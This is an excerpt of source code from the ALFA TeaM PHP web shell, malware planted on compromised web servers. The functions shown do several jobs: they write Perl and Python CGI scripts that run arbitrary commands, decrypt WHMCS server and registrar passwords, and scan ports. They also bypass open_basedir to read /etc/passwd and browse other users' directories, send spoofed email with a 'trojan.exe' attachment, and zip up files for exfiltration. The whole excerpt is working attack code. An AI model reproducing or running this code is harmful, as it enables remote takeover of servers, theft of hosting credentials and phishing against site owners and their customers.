- echo $_POST['alfa1']!='loadfile'?htmlspecialchars($_POST['alfa2']):'';
- echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
- } echo "</td></tr>";
- } echo "</table></form><br/>";
- if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
- if($db->fetch()) echo "<form onsubmit=\"fs('3',this.f.value);
- return false;
- \"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
- } if(@$_POST['alfa1'] == 'loadfile'){ $file = $db->loadFile($_POST['alfa2']);
- echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
- } }else{ echo htmlspecialchars($db->error());
- } echo '</div>';
- alfafooter();
- } function alfaselfrm(){ if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){ echo(__pre().'<center>');
- if(@unlink($GLOBALS['__file_path'])){ echo('<b>Shell has been removed</i> :)</b>');
- }else{ echo 'unlink error!';
- } echo('</center>');
- } if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){ echo "<div class=header>";
- echo "
- <center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
- echo '<p><div class="txtfont">Are you kidding me ?? Do you really want to delete this shell??</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');
- "> Yes</a>';
- echo '</p></center></div>';
- } } function alfacgishell(){ alfahead();
- echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="g(\'cgishell\',null,\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="g(\'cgishell\',null,\'py\')">| Python | </a>';
- if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){ @mkdir('cgialfa',0755);
- @chdir('cgialfa');
- alfacgihtaccess('cgi');
- $name = $_POST['alfa1'].'.alfa';
- $perl = '#!/usr/bin/perl -I/usr/local/bandmain'."\n".'use MIME::Base64;
- $WinNT = 0;
- $NTCmdSep = "&";
- $UnixCmdSep = ";
- ";
- $CommandTimeoutDuration = 10;
- $ShowDynamicOutput = 1;
- $username = getlogin || getpwuid($<) || "alfa";
- $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
- $CmdPwd = ($WinNT ? "cd" : "pwd");
- $PathSep = ($WinNT ? "\\\\" : "/");
- $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
- sub ReadParse {local (*in) = @_ if @_;
- local ($i, $loc, $key, $val);
- if($ENV{\'REQUEST_METHOD\'} eq "GET"){$in = $ENV{\'QUERY_STRING\'};
- }elsif($ENV{\'REQUEST_METHOD\'} eq "POST"){read(STDIN, $in, $ENV{\'CONTENT_LENGTH\'});
- }@in = split(/&/, $in);
- foreach $i (0 .. $#in){$in[$i] =~ s/\\+/ /g;
- ($key, $val) = split(/=/, $in[$i], 2);
- $key =~ s/%(..)/pack("c", hex($1))/ge;
- $val =~ s/%(..)/pack("c", hex($1))/ge;
- $in{$key} .= "\\0" if (defined($in{$key}));
- $in{$key} .= $val;
- }}sub PrintPageHeader{$EncodedCurrentDir = $CurrentDir;
- $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/\'%\'.unpack("H*",$1)/eg;
- print "Content-type: text/html\\n\\n";
- print \'<html><head><title>Coded by ALFA TeAM - CGI Perl</title></head><body onload="document.getElementById(\\\'cmd\\\').focus();
- " bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#FFFFFF"><table border="1" width="100%" cellspacing="0" cellpadding="2"><tr><font color="red"><b>Coded by sole sad & invisible ~ solevisible@gmail.com</b></font><td bgcolor="#000000" bordercolor="#FFFFFF" align="center" width="1%"><b><font size="2" color="#ff0000">#</font></b></td><td bgcolor="#000000" width="98%"><font face="Verdana" size="2"><b> <font color="#22E228"><b>Solevisible Cgi Perl</b></font> Connected to \'.$ServerName.\'</b></td></tr></table>\';
- }sub PrintPageFooter{print "</font></body></html>";
- }sub PrintCommandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$username\\@$ServerName $CurrentDir]\\$ ";
- print \'<form onsubmit="this.c.value=btoa(unescape(encodeURIComponent(this.c.value)));
- this.d.value=btoa(unescape(encodeURIComponent(this.d.value)));
- " name="f" method="POST" action="\'.$ScriptLocation.\'"><input type="hidden" name="d" value="\'.$CurrentDir.\'">\'.$Prompt.\'<input type="text" name="c" id="cmd" size="30"><input type="submit" value=">>"></form>\';
- }sub CommandTimeout{if(!$WinNT){alarm(0);
- print "</xmp><code>Command exceeded maximum time of $CommandTimeoutDuration second(s).<br>Killed it!";
- &PrintCommandLineInputForm;
- &PrintPageFooter;
- exit;
- }}sub ExecuteCommand{if($RunCommand =~ m/^\\s*cd\\s+(.+)/) {$OldDir = $CurrentDir;
- $Command = "cd \\"$CurrentDir\\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
- chop($CurrentDir = `$Command`);
- &PrintPageHeader("c");
- $Prompt = $WinNT ? "$OldDir> " : "[$username\\@$ServerName $OldDir]\\$ ";
- print "$Prompt $RunCommand";
- }else{&PrintPageHeader("c");
- $Prompt = $WinNT ? "$CurrentDir> " : "[$username\\@$ServerName $CurrentDir]\\$ ";
- print "$Prompt $RunCommand<xmp>";
- $Command = "cd \\"$CurrentDir\\"".$CmdSep.$RunCommand.$Redirector;
- if(!$WinNT){$SIG{\'ALRM\'} = \\&CommandTimeout;
- alarm($CommandTimeoutDuration);
- }if($ShowDynamicOutput){$|=1;
- $Command .= " |";
- open(CommandOutput, $Command);
- while(<CommandOutput>){$_ =~ s/(\\n|\\r\\n)$//;
- print "$_\\n";
- }$|=0;
- }else{print `$Command`;
- }if(!$WinNT){alarm(0);
- }print "</xmp>";
- }&PrintCommandLineInputForm;
- &PrintPageFooter;
- }&ReadParse;
- $ScriptLocation = $ENV{\'SCRIPT_NAME\'};
- $ServerName = $ENV{\'SERVER_NAME\'};
- $RunCommand = decode_base64($in{\'c\'});
- $CurrentDir = decode_base64($in{\'d\'});
- chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
- &ExecuteCommand;
- ';
- $py = '#!/usr/bin/python'."\n".'try:'."\n".''."\t".'import cgitb;
- cgitb.enable()'."\n".'except:'."\n".''."\t".'pass'."\n".'import sys,cgi,os,getpass,base64,urllib'."\n".'sys.stderr = sys.stdout'."\n".'from time import strftime'."\n".'import traceback'."\n".'from StringIO import StringIO'."\n".'from traceback import print_exc'."\n".'if os.environ.has_key("SCRIPT_NAME"):'."\n".''."\t".'scriptname = os.environ["SCRIPT_NAME"]'."\n".'else:'."\n".''."\t".'scriptname = ""'."\n".'def alfaCmd(c):'."\n".''."\t".'child_stdin, child_stdout = os.popen2(c)'."\n".''."\t".'child_stdin.close()'."\n".''."\t".'result = child_stdout.read()'."\n".''."\t".'child_stdout.close()'."\n".''."\t".'return result'."\n".'form = cgi.FieldStorage()'."\n".'cmd = form.getvalue(\'c\')'."\n".'dir = form.getvalue(\'d\')'."\n".'if cmd:'."\n".''."\t".'cmd = urllib.unquote(base64.b64decode(cmd))'."\n".'if dir:'."\n".''."\t".'dir = urllib.unquote(base64.b64decode(dir))'."\n".'if cmd:'."\n".''."\t".'if cmd[0:3] == \'cd \':'."\n".''."\t".''."\t".'ncmd = \'cd \' + dir + \';
- \' + cmd + \';
- pwd\''."\n".''."\t".''."\t".'CurrentDir = alfaCmd(ncmd).replace(\'\\n\',\'\')'."\n".'if not dir and \'CurrentDir\' not in locals():'."\n".''."\t".'CurrentDir = alfaCmd(\'pwd\').replace(\'\\n\',\'\')'."\n".'else:'."\n".''."\t".'if \'CurrentDir\' not in locals():'."\n".''."\t".''."\t".'CurrentDir = dir'."\n".'Prompt = \'[\'+getpass.getuser()+\'@\'+os.environ["SERVER_NAME"]+\' \'+CurrentDir+\']$\''."\n".'theform = \'<form onsubmit="this.c.value=btoa(unescape(encodeURIComponent(this.c.value)));
- this.d.value=btoa(unescape(encodeURIComponent(this.d.value)));
- " name="f" method="POST" action="\'+scriptname+\'"><input type="hidden" name="d" value="\'+CurrentDir+\'">\'+Prompt+\' <input type="text" name="c" ><input type="submit" size="30" value=">>"></form>\''."\n".'errormess = \'<center><h2>Something Went Wrong</h2><br><pre>\''."\n".'if __name__ == \'__main__\':'."\n".''."\t".'print "Content-type: text/html\\r\\n"'."\n".''."\t".'print \'<body onload="document.f.c.focus();
- " bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#FFFFFF"><table border="1" width="100%" cellspacing="0" cellpadding="2"><tr><font color="red"><b>Coded by sole sad & invisible ~ solevisible@gmail.com</b></font><td bgcolor="#000000" bordercolor="#FFFFFF" align="center" width="1%"><b><font size="2" color="#ff0000">#</font></b></td><td bgcolor="#000000" width="98%"><font face="Verdana" size="2"><b> <font color="#22E228"><b>Solevisible Cgi Python</b></font> Connected to \'+os.environ["SERVER_NAME"]+\'</b></td></tr></table>\''."\n".''."\t".'print \'<html><head><title>Coded by ALFA TeAM - CGI Python</title><meta charset="UTF-8"></head>\''."\n".''."\t".'print theform'."\n".''."\t".'if cmd:'."\n".''."\t".''."\t".'print \'<br><br>\''."\n".''."\t".''."\t".'print \'<b>Command : \', cmd, \'</b><br><br>\''."\n".''."\t".''."\t".'print \'Result : <br><br>\''."\n".''."\t".''."\t".'try:'."\n".''."\t".''."\t".''."\t".'cmd = \'cd \' + CurrentDir + \';
- \' + cmd'."\n".''."\t".''."\t".''."\t".'print \'<xmp>\'+alfaCmd(cmd)+\'</xmp>\''."\n".''."\t".''."\t".'except Exception, e:'."\n".''."\t".''."\t".''."\t".'print errormess'."\n".''."\t".''."\t".''."\t".'f = StringIO()'."\n".''."\t".''."\t".''."\t".'print_exc(file=f)'."\n".''."\t".''."\t".''."\t".'a = f.getvalue().splitlines()'."\n".''."\t".''."\t".''."\t".'for line in a:'."\n".''."\t".''."\t".''."\t".''."\t".'print line'."\n".''."\t".'print \'</body></html>\'';
- if($_POST['alfa1']=='perl'){$code = $perl;
- }else{$code = $py;
- } if(__write_file($name,$code)){ @chmod($name,0755);
- echo __pre().AlfaiFrameCreator('cgialfa/'.$name);
- } } echo "</div>";
- alfafooter();
- } function alfaWhmcs(){ alfahead();
- echo '<div class=header>';
- function decrypt($string,$cc_encryption_hash){ $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
- $hash_key = _hash($key);
- $hash_length = strlen ($hash_key);
- $string = __ZGVjb2Rlcg($string);
- $tmp_iv = substr ($string, 0, $hash_length);
- $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
- $iv = $out = '';
- $c = 0;
- while ($c < $hash_length) { $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
- ++$c;
- } $key = $iv;
- $c = 0;
- while ($c < strlen ($string)) { if (($c != 0 AND $c % $hash_length == 0)) { $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
- } $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
- ++$c;
- } return $out;
- } function _hash($string) { if(function_exists('sha1')) { $hash = sha1 ($string);
- } else { $hash = md5 ($string);
- } $out = '';
- $c = 0;
- while ($c < strlen ($hash)) { $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
- $c += 2;
- } return $out;
- } AlfaNum(8,9,10);
- echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value);
- return false;
- \">
- <input type='hidden' name='form_action' value='2'>";
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50') );
- create_table($table);
- echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
- if($_POST['alfa5']!=''){ $db_host=($_POST['alfa7']);
- $db_username=($_POST['alfa3']);
- $db_password=($_POST['alfa4']);
- $db_name=($_POST['alfa5']);
- $cc_encryption_hash=($_POST['alfa6']);
- echo __pre();
- $conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
- $query = mysqli_query($conn,"SELECT * FROM tblservers");
- $num = mysqli_num_rows($query);
- if ($num > 0){ for($i=0;
- $i <=$num-1;
- $i++){ $v = @mysqli_fetch_array($query);
- $ipaddress = $v['ipaddress'];
- $username = $v['username'];
- $type = $v['type'];
- $active = $v['active'];
- $hostname = $v['hostname'];
- echo("<center><table border='1'>");
- $password = decrypt ($v['password'], $cc_encryption_hash);
- echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
- echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
- echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
- echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
- echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
- echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
- echo "</table><br><br></center>";
- } $query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
- $num1 = @mysqli_num_rows($query1);
- if ($num1 > 0){ for($i=0;
- $i <=$num1 -1;
- $i++){ $v = mysqli_fetch_array($query1);
- $registrar = $v['registrar'];
- $setting = $v['setting'];
- $value = decrypt($v['value'], $cc_encryption_hash);
- if ($value==""){ $value=0;
- } echo("<center>Domain Reseller <br><center>");
- echo("<center><table border='1'>");
- echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
- echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
- echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
- echo "</table><br><br></center>";
- } } }else{__alert('<font color="red">tblservers is Empty...!</font>');
- };
- } echo "</div>";
- alfafooter();
- } function alfaportscanner(){ alfahead();
- echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
- <form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value);
- return false;
- ">
- <input type="hidden" name="y" value="phptools">
- <div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
- <div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
- <div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
- </form></center><br>';
- $start = strip_tags($_POST['alfa2']);
- $end = strip_tags($_POST['alfa3']);
- $host = strip_tags($_POST['alfa4']);
- if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){ echo __pre();
- $packetContent = "GET / HTTP/1.1\r\n\r\n";
- if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
- else{ $packetContent = str_replace(array("\r","\n"), "", $packetContent);
- $packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
- } for($i = $start;
- $i<=$end;
- $i++){ $sock = @fsockopen($host, $i, $errno, $errstr, 3);
- if($sock){ stream_set_timeout($sock, 5);
- fwrite($sock, $packetContent."\r\n\r\n\x00");
- $counter = 0;
- $maxtry = 1;
- $bin = "";
- do{ $line = fgets($sock, 1024);
- if(trim($line)=="")$counter++;
- $bin .= $line;
- }while($counter<$maxtry);
- fclose($sock);
- echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
- echo "<p><textarea style='height:140px;
- width:50%;
- '>".$bin."</textarea></p></center>";
- } flush();
- } } echo '</div>';
- alfafooter();
- } function alfacgihtaccess($m,$d=''){ if($m=='cgi'){ $code = "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
- }elseif($m=='sym'){ $code = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- }elseif($m=='shtml'){ $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
- } @__write_file($d.'.htaccess',$code);
- } function alfabasedir(){ alfahead();
- echo '<div class=header>
- <center><p><div class="txtfont_header">| Open Base Dir |</div></p><h3><a href=javascript:void(0) onclick="g(\'basedir\',null,\'php\',null)">| php |</a><a href=javascript:void(0) onclick="g(\'basedir\',null,null,\'perl\')">| Perl |</a><a href=javascript:void(0) onclick="g(\'basedir\',null,null,null,\'py\')">| Python |</a></h3></center>';
- $pathBase=pathinfo(str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']));
- $direcTBase=pathinfo($pathBase['dirname']);
- if($_POST['alfa1'] == "php"){ AlfaNum();
- ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
- set_time_limit(0);
- @$passwd = file('/etc/passwd');
- if(!is_array($passwd)){ $tmp=ALFA_TEMPDIR.'/passwd.txt';
- $p=pathinfo($GLOBALS['__file_path']);
- $tmp2=str_replace('\\','/',$p['dirname']).'/alfa_passwd.txt';
- $passwd = alfaEx('cat /etc/passwd >'.$tmp.';
- cat /etc/passwd >'.$tmp2);
- @$passwd = file($tmp);
- if(!is_array($passwd))@$passwd = file($tmp2);
- if(!is_array($passwd))die('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');
- } $pub = array();
- $users = array();
- foreach($passwd as $str){ $pos = strpos($str,':');
- $username = substr($str,0,$pos);
- $dirz = $direcTBase['dirname'].'/'.$username.'/'.$pathBase['basename'];
- if(($username != '')){ if (@is_readable($dirz)){ array_push($users,$username);
- array_push($pub,$dirz);
- }}} echo '<br><br>';
- echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
- echo "<b><font color=\"#FFFFFF\">[+] Founded ".sizeof($pub)." readable ".$direcTBase['dirname'].'/*/'.$pathBase['basename']." directories\n"."<br /></font></b>";
- echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
- foreach($users as $user){ $path = $direcTBase['dirname'].'/'.$user.'/'.$pathBase['basename'].'/';
- echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");
- return false;
- '><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
- } echo '<br><br></b>';
- } if($_POST['alfa2'] && $_POST['alfa2'] == "perl"){ AlfaNum();
- @mkdir('cgialfa',0755);
- @chdir('cgialfa');
- alfacgihtaccess('cgi');
- @__write_file('basedir.alfa','#!/usr/bin/perl -I/usr/local/bandmain'."\n".'use CGI;
- print "Content-type: text/html\\n\\n";
- print "<html>";
- print "<title>Alfa Team~ OpenBaseDir with Perl</title>";
- print "<body bgcolor=\'black\'>";
- my $dirname = CGI::url_param("dirname");
- my $basename = CGI::url_param("basename");
- open my $passwd, "<", "/etc/passwd" or die "Can\'t open /etc/passwd: $!";
- my @allusers;
- my @readable_users;
- $i = 1;
- while (<$passwd>) {my ($user, undef, $id) = split /:/;
- chomp $user;
- if(-r $dirname."/".$user."/".$basename){push(@readable_users,$i++);
- }push(@allusers,$i++);
- }print("<center><b><font color=\\"yellow\\">[ Alfa Team~ OpenBaseDir with Perl ]</font></b><br><hr></center>");
- print("<b><font color=\\"#00A220\\">[+] Founded ".scalar(@allusers)." entrys in /etc/passwd</font></b><br />");
- print("<b><font color=\\"#FFFFFF\\">[+] Founded ".scalar(@readable_users)." readable ".$dirname."/*/".$basename." directories</font></b><br />");
- print("<b><font color=\\"#FF0000\\">[~] Searching for passwords in config files...</font></b><br /><br /><br />");
- open my $passwd, "<", "/etc/passwd" or die "Can\'t open /etc/passwd: $!";
- $b=1;
- while (<$passwd>) {my ($user, undef, $id) = split /:/;
- chomp $user;
- if(-r $dirname."/".$user."/".$basename){print "<div style=\'border: 1px solid green;
- \'><p><b><font color=\'yellow\'>".$b++." : ".$dirname."/".$user."/".$basename."</b><br>Use Command: dir<br>Result:<br></font><br><font color=\'red\'>";
- system("dir ".$dirname."/".$user."/".$basename);
- print("</font><p></div>")}}print "</body></html>";
- ');
- @chmod('basedir.alfa',0755);
- echo AlfaiFrameCreator('cgialfa/basedir.alfa?dirname='.urlencode($direcTBase['dirname']).'&basename='.urlencode($pathBase['basename']).'');
- } if($_POST['alfa3'] && $_POST['alfa3'] == "py"){ AlfaNum();
- @mkdir('cgialfa',0755);
- @chdir('cgialfa');
- alfacgihtaccess('cgi');
- @__write_file('basedirpy.alfa','#!/usr/bin/python'."\n".'try:'."\n".''."\t".'import cgitb;
- cgitb.enable()'."\n".'except:'."\n".''."\t".'pass'."\n".'import sys, cgi, os, commands'."\n".'form = cgi.FieldStorage() '."\n".'dirname = form.getvalue(\'dirname\')'."\n".'basename = form.getvalue(\'basename\')'."\n".'print "Content-type:text/html\\r\\n\\r\\n"'."\n".'print "<html>" '."\n".'print "<head>"'."\n".'print "<title>Alfa Team~ OpenBaseDir with Python</title>"'."\n".'print "</head>"'."\n".'print "<body bgcolor=\'black\'>"'."\n".'passwd = open("/etc/passwd","r")'."\n".'i = 0'."\n".'b = 0'."\n".'for line in passwd:'."\n".''."\t".'user = line.split(":")'."\n".''."\t".'if os.access(dirname+"/"+user[0]+"/"+basename, os.R_OK):'."\n".''."\t".''."\t".'i += 1'."\n".''."\t".'b += 1'."\n".'passwd.close()'."\n".'print "<center><b><font color=\'yellow\'>[ Alfa Team~ OpenBaseDir with Python ]</font></b><br><hr></center>"'."\n".'print "<font color=\'#00A220\'><b>[+] Founded ",b," entrys in /etc/passwd</b></font><br>"'."\t".''."\n".'print "<font color=\'#FFFFFF\'><b>[+] Founded ",i," readable "+dirname+"/*/"+basename+" directories</b></font><br>"'."\n".'print "<font color=\'#FF0000\'><b>[~] Searching for passwords in config files...</b></font><br><br><br>"'."\t".''."\n".'i = 1'."\n".'passwd = open("/etc/passwd","r")'."\n".'for line in passwd:'."\n".''."\t".'user = line.split(":")'."\n".''."\t".'if os.access(dirname+"/"+user[0]+"/"+basename, os.R_OK):'."\n".''."\t".''."\t".'print "<div style=\'border: 1px solid green;
- \'><p><font color=\'yellow\'><b>",i,": "+dirname+"/"+user[0]+"/"+basename+"</b><br>"'."\n".''."\t".''."\t".'print "Use Command: dir<br>Result:<br></font><br><font color=\'red\'>"'."\n".''."\t".''."\t".'print commands.getoutput("dir "+ dirname+"/"+user[0]+"/"+basename)'."\n".''."\t".''."\t".'print "</font></div>"'."\n".''."\t".''."\t".'i += 1'."\n".'passwd.close()'."\n".'print "</body>"'."\n".'print "</html>"');
- @chmod('basedirpy.alfa',0755);
- echo AlfaiFrameCreator('cgialfa/basedirpy.alfa?dirname='.urlencode($direcTBase['dirname']).'&basename='.urlencode($pathBase['basename']).'');
- } echo '</div>';
- alfafooter();
- } function alfamail(){ alfahead();
- echo '<div class=header>';
- AlfaNum(8,9,10);
- echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value);
- return false;
- ">';
- $table = array( 'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60') );
- create_table($table);
- echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
- if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){ $mail_to = $_POST['alfa1'];
- $mail_from = $_POST['alfa2'];
- $mail_subject = $_POST['alfa3'];
- $mail_content = $_POST['alfa5'];
- $count_mail = (int)$_POST['alfa6'];
- $mail_attach = $_POST['alfa7'];
- if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){ if(!empty($mail_attach)&&@is_file($mail_attach)){ $file = $mail_attach;
- $content = __read_file($file);
- $content = chunk_split(__ZW5jb2Rlcg($content));
- $uid = md5(uniqid(time()));
- $filename = basename($file);
- $headers = "From: ".$mail_from." <".$mail_from.">\r\n";
- $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
- $headers .= "Reply-To: ".$mail_from."\r\n";
- $headers .= "Content-Type: multipart/mixed;
- boundary=\"".$uid."\"\r\n\r\n";
- $headers .= 'MIME-Version: 1.0' . "\r\n";
- $headers .= 'X-Mailer: php' . "\r\n";
- $mail_content = "--".$uid."\r\n";
- $mail_content .= "Content-type:text/plain;
- charset=iso-8859-1\r\n";
- $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
- $mail_content .= $mail_content."\r\n\r\n";
- $mail_content .= "--".$uid."\r\n";
- $mail_content .= "Content-Type: application/octet-stream;
- name=\"".$filename."\"\r\n";
- $mail_content .= "Content-Transfer-Encoding: base64\r\n";
- $mail_content .= "Content-Disposition: attachment;
- filename=\"".$filename."\"\r\n\r\n";
- $mail_content .= $content."\r\n\r\n";
- $mail_content .= "--".$uid."--";
- }else{ $headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
- $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
- $headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
- $headers .= 'Content-type: text/html;
- charset=utf-8' . "\r\n";
- $headers .= 'MIME-Version: 1.0' . "\r\n";
- $headers .= 'X-Mailer: php' . "\r\n";
- } if(empty($count_mail)||$count_mail<1)$count_mail=1;
- if(!empty($mail_from)){echo __pre();
- for($i=1;
- $i<=$count_mail;
- $i++){ if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
- }}else{__alert("Invalid Mail From !");
- } }else{__alert("Invalid Mail To !");
- } } echo('</div>');
- alfafooter();
- } function alfaziper(){ alfahead();
- AlfaNum(8,9,10);
- echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
- <form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');
- return false;
- " method="post">
- <div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['cwd']).'" size="60"/>
- <div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
- <input type="submit" value=" " name="ziper" />
- </form></center></p>';
- if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){ $dirzip = $_POST['alfa3'];
- $zipfile = $_POST['alfa4'];
- if (class_exists('ZipArchive')&&($GLOBALS['sys']!='unix'||strlen(alfaEx("whoami"))==0)){ $code='if(!extension_loaded(\'zip\')||!file_exists($source)){return false;
- }$zip=new ZipArchive();
- if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;
- }$source=str_replace(\'\\\\\',\'/\',realpath($source));
- if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);
- foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);
- if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;
- $file=realpath($file);
- if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));
- }else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));
- }}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));
- }return $zip->close();
- ';
- $newfunc = create_function('$source,$destination', $code);
- if($newfunc($dirzip, $zipfile)){ echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
- }else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';
- } }else{ alfaEx("zip -r $zipfile $dirzip > /dev/null &");
- echo __pre().'<center><p>Please Wait For 1 min AND Check this -> <b><font color="green">'.$zipfile.'</font></b><br>Because We Executed The Command in The background !</p></center>';
- }} echo '</div>';
